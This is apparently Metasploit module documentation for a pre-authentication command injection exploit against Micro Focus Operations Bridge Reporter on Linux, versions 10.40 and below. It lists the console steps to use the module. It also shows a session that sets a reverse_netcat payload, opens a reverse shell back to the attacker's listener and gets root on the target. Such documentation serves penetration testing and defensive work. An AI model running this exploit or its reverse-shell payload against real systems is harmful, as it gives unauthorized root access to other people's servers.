## Vulnerable Application

This module exploits a command injection vulnerability on *login* (yes, you read that right) that affects Micro Focus Operations
Bridge Reporter on Linux, versions 10.40 and below.
It's a straight up command injection, with little escaping required and it works before authentication.
This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.

Installation docs are available at:

* https://docs.microfocus.com/itom/Operations_Bridge_Reporter:10.40/Home

Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.
This vulnerability only affects Linux installations.

All details about this vulnerability can be obtained from the advisory:

* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md

## Verification Steps

1. Install the application
2. Start msfconsole
3. `use exploit/multi/http/microfocus_obr_cmd_injection`
4. `set payload PAYLOAD`
5. `set rhost TARGET`
6. `set lhost YOUR_IP`
7. `run`
8. You should get a shell.

## Scenarios

```
msf6 > use exploit/linux/http/microfocus_obr_cmd_injection
msf6 exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10
rhost => 10.0.0.10
msf6 exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf6 exploit(linux/http/microfocus_obr_cmd_injection) > run

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
